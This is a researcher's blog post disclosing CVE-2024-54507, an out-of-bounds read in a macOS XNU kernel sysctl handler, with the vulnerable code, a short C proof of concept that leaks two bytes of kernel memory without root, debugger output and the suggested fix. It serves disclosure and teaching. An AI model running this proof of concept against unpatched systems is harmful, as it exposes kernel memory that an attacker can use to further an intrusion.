JPRX.IO




SUSCTL (CVE-2024-54507)

A particularly 'sus' sysctl in the XNU Kernel

The kernel might just be an impostor.

TLDR: here is a PoC.

Every time Apple releases a new version of XNU, I run a custom suite of tests under an address sanitizer to see if I can spot any regressions, or even possibly new bugs. When I was messing around with macOS 15.0, I was shocked to see a very simple command was causing the sanitizer to report an invalid load.

If you run sysctl -a on macOS 15.0 running with KASAN, you'll see a crash like the following:

panic(cpu 0): KASan: invalid 4-byte load [PARTIAL2]
 @kasan-report.c:114
Panicked task 0xffffff86aa0fc800: 1 threads: pid 602: sysctl
Backtrace (CPU 0), panicked thread: 0xffffff869afa90d0, Frame : Return Address
0xffffffff011ff450 : 0xffffff801849b53b mach_kernel : _handle_debugger_trap + 0x4bb
0xffffffff011ff4b0 : 0xffffff8018a0313a mach_kernel : _kdp_i386_trap + 0x15a
0xffffffff011ff4f0 : 0xffffff80189e9c13 mach_kernel : _kernel_trap + 0xe23
0xffffffff011ff680 : 0xffffff8018a0d051 mach_kernel : trap_from_kernel + 0x26
0xffffffff011ff6a0 : 0xffffff801849ab1a mach_kernel : _DebuggerTrapWithState + 0x9a
0xffffffff011ff7d0 : 0xffffff801849bbff mach_kernel : _panic_trap_to_debugger + 0x2af
0xffffffff011ff840 : 0xffffff801a130ec4 mach_kernel : _panic + 0x8a
0xffffffff011ff930 : 0xffffff801a15e783 mach_kernel : _kasan_report_internal.cold.1 + 0x23
0xffffffff011ff940 : 0xffffff801a1257a9 mach_kernel : _kasan_report_internal + 0x279
0xffffffff011ff9b0 : 0xffffff801a12528b mach_kernel : _kasan_crash_report + 0x2b
0xffffffff011ff9e0 : 0xffffff801a125995 mach_kernel : ___asan_report_load4 + 0x15
0xffffffff011ff9f0 : 0xffffff80192e23e4 mach_kernel : _sysctl_udp_log_port + 0x244
0xffffffff011ffad0 : 0xffffff801970b81c mach_kernel : _sysctl_root + 0xf4c
0xffffffff011ffc80 : 0xffffff801970c197 mach_kernel : _sysctl + 0x577
0xffffffff011ffed0 : 0xffffff8019c143b2 mach_kernel : _unix_syscall64 + 0x492
0xffffffff011fffa0 : 0xffffff8018a0d496 mach_kernel : _hndl_unix_scall64 + 0x16

Process name corresponding to current thread: sysctl

In case you aren't familiar with sysctl's, they are basically a set of runtime-controllable kernel variables that you can adjust from userspace. A lot of the time, the underlying resource of a given sysctl is literally just an integer in the kernel somewhere (like this). They're commonly used in kernel programming as a quick way to adjust parameters, and are used all over XNU.

Running sysctl -a will enumerate all sysctl's in the system. Somehow, doing this causes an invalid load.

There are a variety of ways to declare a sysctl using macros from sysctl.h, with support for many common types such as int's or struct's. These macros handle all the boilerplate of copying values in from userspace and copying kernel values out, and provide some security flags as well.

The more interesting kind of sysctl is SYSCTL_PROC, where a custom handler is used to service the sysctl instead of the kernel-supplied boilerplate. When writing a SYSCTL_PROC, you are responsible for validating user requests, updating the kernel state, and returning values to userspace.

You can read more about implementing sysctl's here [1].

The Bug

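That brings us to our bug. sysctl_udp_log_port is one of those SYSCTL_PROC handlers, and is also the function in our backtrace causing a PARTIAL2 KASAN load violation. This handler is shared by four unique sysctl's under net.inet.udp.log: local_port_included, remote_port_included, local_port_excluded, and remote_port_excluded.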

Each of these sysctl's maps to a 2-byte uint16_t in the kernel defined in udp_log.c. The relationship between the user-visible sysctl name and the kernel variable is established using the SYSCTL_PROC macro.

When the user tries to read from or write to one of these four sysctl's, the handler function (where the bug is) is called. Let's take a look at the source of this handler. According to the address sanitizer, we are loading 2 bytes too many. Can you see why?

static int
sysctl_udp_log_port SYSCTL_HANDLER_ARGS
{
#pragma unused(arg1, arg2)
    int error;
    int new_value = *(int *)oidp->oid_arg1;

    error = sysctl_handle_int(oidp, &new_value, 0, req);
    if (error != 0) {
        return error;
    }
    if (new_value < 0 || new_value > UINT16_MAX) {
        return EINVAL;
    }
    *(uint16_t *)oidp->oid_arg1 = (uint16_t)new_value;

    return 0;
}

When sysctl_udp_log_port is invoked, oidp->oid_arg1 will point to one of the four uint16_t's from above, depending on which sysctl was requested. This function mostly just wraps sysctl_handle_int, which both validates the user-requested new value for the sysctl (writing it into new_value), and simultaneously copies out the current value of the sysctl to userspace.

Before storing the new value back into the underlying uint16_t variable, the kernel checks whether the store would overflow. If new_value is less than 0 or more than UINT16_MAX, we return EINVAL and do not update oid_arg1. Otherwise, we write new_value to oid_arg1, treating it as a properly sized uint16_t. This check is sufficient to prevent overwrites, but an overread has already occurred...
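The write-side check described above can be sketched in plain userspace C. This is only an illustration of the pattern; store_port is a hypothetical helper name, not something that exists in XNU.

```c
#include <errno.h>
#include <stdint.h>

/* Hypothetical helper (not in XNU): validate an int before narrowing it
 * into a uint16_t, mirroring the range check in the handler. */
static int store_port(uint16_t *dst, int new_value)
{
    if (new_value < 0 || new_value > UINT16_MAX) {
        return EINVAL;              /* would not fit; *dst is left untouched */
    }
    *dst = (uint16_t)new_value;     /* safe: value is known to fit in 16 bits */
    return 0;
}
```

Note that this only guards the store. Nothing here says anything about how the current value was loaded in the first place.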

Integer Type Confusion

The bug is that when we load oidp->oid_arg1 into new_value, we treat it as an integer pointer (4 bytes), rather than a uint16_t pointer (2 bytes). That's why we observed 2 bytes of out-of-bounds data being read when we ran sysctl -a.

int new_value = *(int *)oidp->oid_arg1; // Out-of-bounds read because oid_arg1 is a u16, not i32

Then, when we call sysctl_handle_int, we pass the OOB read data back to userspace. Even though we detect the overflow and return EINVAL, the OOB read has already occurred, and is visible from userspace!
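To make the overread concrete, here is a small userspace simulation of the same mistake. It is a sketch under assumptions: struct fake_globals, buggy_load, and leaked_bytes are made-up names for illustration, and memcpy stands in for the kernel's cast so the demo itself stays well-defined.

```c
#include <stdint.h>
#include <string.h>

/* Stand-in for the kernel's layout: a 2-byte port followed by unrelated data. */
struct fake_globals {
    uint16_t port;      /* plays the role of the uint16_t behind oid_arg1 */
    uint16_t neighbor;  /* whatever happens to live right after it */
};

/* Mimics `*(int *)oid_arg1`: reads 4 bytes starting at a 2-byte object. */
static int32_t buggy_load(const void *arg1)
{
    int32_t v;
    memcpy(&v, arg1, sizeof(v));
    return v;
}

/* Extracts the 2 bytes that came from beyond `port`, in memory order. */
static void leaked_bytes(const struct fake_globals *g, uint8_t out[2])
{
    int32_t v = buggy_load(&g->port);
    memcpy(out, (const uint8_t *)&v + sizeof(uint16_t), 2);
}
```

Whatever is stored in neighbor comes back out through the 4-byte load, even though the caller only asked about port.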

Leaking (2 bytes of) Kernel Memory

We can leak two bytes of kernel memory by simply reading from the last sysctl in memory (remote_port_excluded). This sysctl can be read without root.

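#include <stdint.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/sysctl.h>

void leak(void) {
    uint64_t val = 0;
    size_t len = sizeof(val);
    // The handler copies out 4 bytes: the real uint16_t, then 2 bytes past it.
    sysctlbyname("net.inet.udp.log.remote_port_excluded", &val, &len, NULL, 0);
    printf("leaked: 0x%X 0x%X\n", (unsigned)((val >> 16) & 0xFF), (unsigned)((val >> 24) & 0xFF));
}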

I tried this on an xnu-11215.1.10 VMAPPLE ARM64 release flavor kernel that I compiled locally. In the kernel that I compiled I observed net.inet.udp.log_in_vain, some random other sysctl, placed directly after remote_port_excluded. As ARM64 is little-endian, we can leak the two least significant bytes of this variable.

% sysctl net.inet.udp.log_in_vain
net.inet.udp.log_in_vain: 0
% ./leak
leaked: 0x0 0x0
% sudo sysctl net.inet.udp.log_in_vain=0x1234
net.inet.udp.log_in_vain: 0 -> 4660
% ./leak
leaked: 0x34 0x12
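The byte order in that output follows from how the 4-byte value splits on a little-endian target. A minimal sketch, where own_value and leaked_value are hypothetical helper names and raw is the 32-bit value the sysctl returned:

```c
#include <stdint.h>

/* Assuming a little-endian target: the low half of the returned value is the
 * real port, and the high half is the 2 bytes that sit after it in memory. */
static uint16_t own_value(uint32_t raw)
{
    return (uint16_t)(raw & 0xFFFF);
}

static uint16_t leaked_value(uint32_t raw)
{
    return (uint16_t)(raw >> 16);
}
```

With log_in_vain set to 0x1234 and the port itself at 0, raw is 0x12340000, so the PoC's two shifts print 0x34 and then 0x12.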

Let's take a look at this in a debugger. I attached a debugger and used it to set the two bytes after udp_log_remote_port_excluded (at 0xfffffe002cbf9e8c) to 0xABCD. We should not be able to read these from userspace.

(lldb) p &udp_log_remote_port_excluded
(uint16_t *) 0xfffffe002cbf9e8a
(lldb) x/4bx 0xfffffe002cbf9e8a
0xfffffe002cbf9e8a: 0x00 0x00 0x00 0x00
(lldb) memory write 0xfffffe002cbf9e8c -s 2 0xABCD
(lldb) x/4bx 0xfffffe002cbf9e8a
0xfffffe002cbf9e8a: 0x00 0x00 0xcd 0xab
                    ────┬──── ────┬────
     udp log remote ────┘         └──── leak
     port excluded                      this

Then, I ran leak() and observed the leakage of data beyond the end of udp_log_remote_port_excluded:

% ./leak
leaked: 0xCD 0xAB

What can we leak?

"It depends(TM)".

udp_log.o's common section only has four things in it: those four uint16_t's. For each of them, we can leak 2 extra bytes. As they are all laid out sequentially in memory, the first 3 uint16_t's only give us the next successive variable, which we can already read. However, the last one (remote_port_excluded) leaks 2 bytes of whatever the linker decides to put after udp_log.o.

Here is what this looks like in memory:

udp_log.o's __common section:
┌──────────────────────┐
│  local_port_included │+0
├──────────────────────┤
│ remote_port_included │+2
├──────────────────────┤
│  local_port_excluded │+4
├──────────────────────┤
│ remote_port_excluded │+6
├──────────────────────┤ <- udp_log.o ends here
│         ???          │+8 <- We leak this
└──────────────────────┘
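The arithmetic behind the diagram can be checked with a few lines of C. This sketch assumes the layout shown above (four consecutive uint16_t's, 8 bytes total); overrun_bytes is a made-up helper, not kernel code.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define PORT_COUNT   4
#define SECTION_SIZE (PORT_COUNT * sizeof(uint16_t))   /* 8 bytes, per the diagram */

/* Number of bytes past the end of the section that a 4-byte load
 * starting at variable `index` would touch. */
static size_t overrun_bytes(size_t index)
{
    assert(index < PORT_COUNT);
    size_t start = index * sizeof(uint16_t);   /* +0, +2, +4, +6 */
    size_t end = start + sizeof(int32_t);      /* the buggy load reads 4 bytes */
    return end > SECTION_SIZE ? end - SECTION_SIZE : 0;
}
```

Only the variable at +6 produces a nonzero result (2 bytes). The loads at +0, +2, and +4 stay inside the section and merely overlap the next port variable.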

So, it's totally up to the linker what those two bytes contain. On the kernel I built myself, this was some other sysctl, but on the kernel from the KDK I found that unused padding bytes were put there instead.

The linker's behavior is highly sensitive to build configurations and platform differences, so different XNU platforms will probably have different things placed there.

Bottom line is you get the two bytes after udp_log_remote_port_excluded, whatever they may be.

Fix Patch

At the time of writing, the source code for xnu-11215.61.5 (the version with the fix) is not out yet. When I reported this bug to Apple, I provided the following suggested fix.

@@ -436,7 +436,7 @@ sysctl_udp_log_port SYSCTL_HANDLER_ARGS
 {
 #pragma unused(arg1, arg2)
    int error;
-   int new_value = *(int *)oidp->oid_arg1;
+   int new_value = *(uint16_t *)oidp->oid_arg1;

    error = sysctl_handle_int(oidp, &new_value, 0, req);
    if (error != 0) {
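The effect of the suggested change can be sketched in userspace as well. fixed_load is a hypothetical name, and memcpy again stands in for the pointer cast: only 2 bytes are read, and the result is zero-extended into the int.

```c
#include <stdint.h>
#include <string.h>

/* Mimics `*(uint16_t *)oid_arg1` assigned to an int: reads exactly 2 bytes
 * and widens them, so nothing past the variable is ever touched. */
static int fixed_load(const void *arg1)
{
    uint16_t v;
    memcpy(&v, arg1, sizeof(v));
    return (int)v;   /* always in the range 0..UINT16_MAX */
}
```

Because the widened value can never exceed UINT16_MAX, the bytes after the variable no longer influence what is copied out to userspace.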

Timeline

Takeaways

You can find a proof of concept here.

This bug is a neat example of how difficult kernel programming can be. Even the most seemingly innocuous loads can be deadly. Even though the authors were careful to prevent integer overflows, information leakage was still possible due to the initial 4-byte load.

Specifically, I thought this was a neat case study demonstrating BSD sysctl's, and a good cautionary tale for any would-be sysctl authors to be careful about the consequences of every memory access.

There are many kernel variants for all the different XNU platforms, some of which might leak some interesting data (I didn't check them all). If anyone finds a cool way to use this bug, let me know! Find me on X @0xjprx.

References

[1] John Baldwin. "Implementing System Control Nodes (sysctl)". In: FreeBSD Journal (2014).

-ravi

January 23, 2025